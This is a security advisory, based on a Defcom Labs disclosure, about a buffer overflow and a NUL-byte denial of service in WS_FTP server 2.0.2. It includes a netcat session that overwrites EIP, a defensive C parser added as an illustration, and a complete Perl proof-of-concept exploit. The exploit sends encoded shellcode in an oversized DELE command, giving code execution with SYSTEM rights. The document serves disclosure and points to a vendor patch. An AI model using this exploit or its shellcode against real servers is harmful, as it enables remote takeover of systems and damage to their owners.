COMMAND

    WS_FTP server 2.0.2

SYSTEMS AFFECTED

    WS_FTP server 2.0.2

PROBLEM

    Following  is  based  on  a  Defcom  Labs  Advisory def-2001-28 by
    Andreas  Junestam  and  Janne   Sarendal.   WS_FTP  server   2.0.2
    contains a buffer overflow which affects the following commands:

        * DELE
        * MDTM
        * MLST
        * MKD
        * RMD
        * RNFR
        * RNTO
        * SIZE
        * STAT
        * XMKD
        * XRMD

    This buffer overflow gives an attacker the ability to run code on
    the target with SYSTEM rights, because the server runs as a service
    by default.  This is only valid when logged in as an anonymous user,
    not as an ordinary one.

    The server also contains an easy-to-trigger DoS.  By sending a
    couple of NULL (0x00) characters, the WS_FTP Server will spike at
    100% CPU.

    All the above-mentioned commands seem to use the same parsing code,
    which suffers from a buffer overflow.  Sending a command with an
    argument longer than 478 bytes (a 474-byte buffer plus the new
    return address) overflows the buffer and overwrites EIP.  A
    proof-of-concept exploit is attached to the advisory; it works
    against WS_FTP server 2.0.2 running on WIN2K (Professional and
    Server, any SP).

        C:\tools\web>nc -nvv 127.0.0.1 21
        (UNKNOWN) [127.0.0.1] 21 (?) open
        220-helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
        220-Tue Jun 19 14:00:21 2001
        220-30 days remaining on evaluation.
        220 helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
        user ftp
        331 Password required
        pass ftp
        230 user logged in
        DELE AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        
        Access violation - code c0000005 (first chance)
        eax=000000ea ebx=0067c278 ecx=000000ea edx=00000002 esi=0067c278 edi=77fca3e0
        eip=41414141 esp=0104df88 ebp=41414141 iopl=0         nv up ei pl zr na po nc
        cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010246
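    As an added illustration (not WS_FTP's code, which the advisory does
    not include), the C sketch below shows how a single argument parser
    shared by the listed verbs can be bounded to the 474-byte buffer size
    reported above, refusing both over-long arguments and the NUL bytes
    that trigger the CPU spike before anything is copied.  ARG_BUF_LEN,
    parse_ftp_argument, is_affected_command and the status codes are
    assumed names; the inputs are constructed for the demo.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical sketch, not WS_FTP's code: one argument parser shared by the
 * affected verbs, bounded to the 474-byte buffer size reported above. */
#define ARG_BUF_LEN 474

typedef enum { FTP_OK = 0, FTP_TOO_LONG = -1, FTP_BAD_CHAR = -2, FTP_SYNTAX = -3 } ftp_status;

/* The verbs the advisory lists as sharing the vulnerable parsing code. */
static const char *const affected_cmds[] = {
    "DELE", "MDTM", "MLST", "MKD", "RMD", "RNFR",
    "RNTO", "SIZE", "STAT", "XMKD", "XRMD", NULL
};

int is_affected_command(const char *verb) {
    for (int i = 0; affected_cmds[i] != NULL; i++)
        if (strcmp(verb, affected_cmds[i]) == 0) return 1;
    return 0;
}

/* Parse a raw control-channel line "VERB argument\r\n" of len bytes into arg.
 * len is explicit because the line may carry embedded NULs; the function
 * never writes beyond arg[ARG_BUF_LEN - 1]. */
ftp_status parse_ftp_argument(const char *line, size_t len, char *arg) {
    /* NUL bytes are rejected first: the advisory notes a few 0x00 bytes pin
     * the server at 100% CPU, and they would also truncate a strlen()-based copy. */
    if (memchr(line, '\0', len) != NULL) return FTP_BAD_CHAR;
    while (len > 0 && (line[len - 1] == '\n' || line[len - 1] == '\r')) len--;
    const char *sp = memchr(line, ' ', len);
    if (sp == NULL || sp + 1 == line + len) return FTP_SYNTAX; /* no argument */
    size_t arglen = (size_t)(line + len - (sp + 1));
    /* Bound check before the copy: an unchecked strcpy() here is the defect class. */
    if (arglen >= ARG_BUF_LEN) return FTP_TOO_LONG;
    memcpy(arg, sp + 1, arglen);
    arg[arglen] = '\0';
    return FTP_OK;
}

/* Stand-alone demo: a 478-byte argument, the length the advisory says
 * overwrites EIP, is refused instead of copied. (Constructed input.) */
int main(void) {
    char line[5 + 478 + 2], arg[ARG_BUF_LEN];
    memcpy(line, "DELE ", 5);
    memset(line + 5, 'A', 478);
    memcpy(line + 5 + 478, "\r\n", 2);
    ftp_status rc = parse_ftp_argument(line, sizeof line, arg);
    printf("oversized DELE -> %s\n", rc == FTP_TOO_LONG ? "rejected" : "accepted");
    return rc == FTP_TOO_LONG ? 0 : 1;
}
```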

    The exploit:

    #!/usr/local/bin/perl
    #########################################################################
    #
    # WS_FTP Server 2.0.2 DELE proof-of-concept exploit
    # By andreas@defcom.com and janne@defcom.com (C)2001
    #
    #########################################################################
    $login="ftp";	#username
    $pass="ftp";	#password
    #########################################################################
    $ARGC=@ARGV;
    if ($ARGC != 1) {
        print "WS_FTP server 2.0.2 DELE proof-of-concept exploit\n";
        print "It creates a file named defcom.iyd in the c-root\n";
        print "(C)2001 andreas\@defcom.com\n";
        print "Usage: $0 <host>\n";
        print "Example: $0 127.0.0.1\n";
        exit;
    }
    use Socket;
    
    my($remote,$port,$iaddr,$paddr,$proto);
    $remote=$ARGV[0];
    $port = "21";
    
    $iaddr = inet_aton($remote) or die "Error: $!";
    $paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
    $proto = getprotobyname('tcp') or die "Error: $!";
    
    socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
    connect(SOCK, $paddr) or die "Error: $!";
    
    sleep(1);
    $msg = "user $login\n";
    send(SOCK, $msg, 0) or die "Cannot send query: $!";
    $msg = "pass $pass\n";
    sleep(1);
    send(SOCK, $msg, 0) or die "Cannot send query: $!";
    $sploit = "\x8b\xd8\x8b\xf8\x83\xc0\x18\x33\xc9\x66\xb9\x42\x81\x66\x81\xf1\x80\x80\x80\x30\x95\x40\xe2\xfa\xde\x1e\x76";
    $sploit = $sploit . "\x1e\x7e\x2e\x95\x6f\x95\x95\xc6\xfd\xd5\x95\x95\x95\x2b\x49\x81\xd0\x95\x6a\x83\x96\x56\x1e\x75\x1e\x7d\xa6\x55";
    $sploit = $sploit . "\xc5\xfd\x15\x95\x95\x95\xff\x97\xc5\xc5\xfd\x95\x95\x95\x85\x14\x52\x59\x94\x95\x95\xc2\x2b\xb1\x80\xd0\x95";
    $sploit = $sploit . "\x6a\x83\xc5\x2b\x6d\x81\xd0\x95\x6a\x83\xa6\x55\xc5\x2b\x85\x83\xd0\x95\x6a\x83";
    $msg = "dele " . $sploit . "\xd4" x (460-length($sploit)) .  "\xf6\xaf\xc9\xf1\xf0\xf3\xf6\xfa\xf8\xbb\xfc\xec\xf1\x95";
    $msg = $msg . "\xab\xa3\x54\x77" . "\xd4" x 16 . "\x8b\xc4\x83\xe8\x7f\x83\xe8\x7f\x83\xe8\x7f\x83\xe8\x71\xff\xe0\n";
    print $msg;
    sleep(1);
    send(SOCK, $msg, 0) or die "Cannot send query: $!";
    exit;

SOLUTION

    Download the new version from:

        http://www.ipswitch.com/Support/WS_FTP-Server/patch-upgrades.html